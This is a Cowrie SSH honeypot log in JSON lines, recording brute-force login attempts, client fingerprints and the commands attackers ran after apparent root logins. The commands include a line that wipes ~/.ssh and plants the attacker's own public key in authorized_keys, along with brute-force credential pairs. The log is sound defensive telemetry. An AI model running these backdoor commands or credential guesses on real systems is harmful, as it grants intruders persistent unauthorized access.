{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:18.542484Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53096,"dst_ip":"1.2.3.4","dst_port":22,"session":"62f0d9e0ff06","protocol":"ssh","message":"New connection: 212.227.235.229:53096 (1.2.3.4:22) [session: 62f0d9e0ff06]","sensor":"my-vps","timestamp":"2025-09-09T06:26:18.873557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:18.874950Z","src_ip":"212.227.235.229","session":"62f0d9e0ff06"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:20.054300Z","src_ip":"212.227.235.229","session":"62f0d9e0ff06"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:26:22.521952Z","src_ip":"212.227.235.229","session":"62f0d9e0ff06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42798,"dst_ip":"1.2.3.4","dst_port":22,"session":"97fc2817c4c6","protocol":"ssh","message":"New connection: 212.227.235.229:42798 (1.2.3.4:22) [session: 97fc2817c4c6]","sensor":"my-vps","timestamp":"2025-09-09T06:26:22.709036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:22.717166Z","src_ip":"212.227.235.229","session":"97fc2817c4c6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:22.887757Z","src_ip":"212.227.235.229","session":"97fc2817c4c6"}
{"eventid":"cowrie.login.failed","username":"redhat","password":"redhat1234","message":"login attempt [redhat/redhat1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:26:23.579208Z","src_ip":"212.227.235.229","session":"97fc2817c4c6"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:23.877526Z","src_ip":"212.227.235.229","session":"62f0d9e0ff06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54371,"dst_ip":"1.2.3.4","dst_port":22,"session":"b561ff7abcac","protocol":"ssh","message":"New connection: 212.227.235.229:54371 (1.2.3.4:22) [session: b561ff7abcac]","sensor":"my-vps","timestamp":"2025-09-09T06:26:24.246221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:24.249815Z","src_ip":"212.227.235.229","session":"b561ff7abcac"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:24.620353Z","src_ip":"212.227.235.229","session":"b561ff7abcac"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:24.756538Z","src_ip":"212.227.235.229","session":"97fc2817c4c6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:26.175166Z","src_ip":"212.227.235.229","session":"b561ff7abcac"}
{"eventid":"cowrie.session.closed","duration":"12.3","message":"Connection lost after 12.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:26.515402Z","src_ip":"212.227.235.229","session":"6699712c501d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:26.516382Z","src_ip":"212.227.235.229","session":"b561ff7abcac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55854,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a04f83d6dfd","protocol":"ssh","message":"New connection: 212.227.235.229:55854 (1.2.3.4:22) [session: 2a04f83d6dfd]","sensor":"my-vps","timestamp":"2025-09-09T06:26:32.241395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:32.242104Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:32.620564Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.login.success","username":"root","password":"Newpassword12345","message":"login attempt [root/Newpassword12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:34.087060Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:26:34.860244Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:26:34.861047Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:26:34.861865Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:35.668005Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:26:36.137282Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:26:36.137990Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:26:36.535502Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:36.536417Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56822,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c0478dfa866","protocol":"ssh","message":"New connection: 212.227.235.229:56822 (1.2.3.4:22) [session: 4c0478dfa866]","sensor":"my-vps","timestamp":"2025-09-09T06:26:36.870577Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:36.871595Z","src_ip":"212.227.235.229","session":"4c0478dfa866"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:37.210641Z","src_ip":"212.227.235.229","session":"4c0478dfa866"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:26:38.623935Z","src_ip":"212.227.235.229","session":"4c0478dfa866"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:39.974976Z","src_ip":"212.227.235.229","session":"4c0478dfa866"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57789,"dst_ip":"1.2.3.4","dst_port":22,"session":"941b33b473e0","protocol":"ssh","message":"New connection: 212.227.235.229:57789 (1.2.3.4:22) [session: 941b33b473e0]","sensor":"my-vps","timestamp":"2025-09-09T06:26:40.301650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:40.302467Z","src_ip":"212.227.235.229","session":"941b33b473e0"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:40.633084Z","src_ip":"212.227.235.229","session":"941b33b473e0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:42.123391Z","src_ip":"212.227.235.229","session":"941b33b473e0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:42.460422Z","src_ip":"212.227.235.229","session":"941b33b473e0"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:42.461946Z","src_ip":"212.227.235.229","session":"2a04f83d6dfd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60674,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c928d848a99","protocol":"ssh","message":"New connection: 212.227.235.229:60674 (1.2.3.4:22) [session: 4c928d848a99]","sensor":"my-vps","timestamp":"2025-09-09T06:26:55.406821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:26:55.407764Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:26:55.774882Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.login.success","username":"root","password":"mehdi1820","message":"login attempt [root/mehdi1820] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:26:57.245035Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54093,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5dc4267cb4f","protocol":"ssh","message":"New connection: 212.227.125.160:54093 (1.2.3.4:22) [session: d5dc4267cb4f]","sensor":"my-vps","timestamp":"2025-09-09T06:26:57.659313Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:26:57.660617Z","src_ip":"212.227.125.160","session":"d5dc4267cb4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54347,"dst_ip":"1.2.3.4","dst_port":22,"session":"97253eef0fa2","protocol":"ssh","message":"New connection: 212.227.125.160:54347 (1.2.3.4:22) [session: 97253eef0fa2]","sensor":"my-vps","timestamp":"2025-09-09T06:26:57.772177Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T06:26:57.773365Z","src_ip":"212.227.125.160","session":"97253eef0fa2"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-09T06:26:57.887003Z","src_ip":"212.227.125.160","session":"97253eef0fa2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:26:58.078027Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:26:58.078718Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:26:58.081130Z","src_ip":"212.227.235.229","session":"4c928d848a99"}
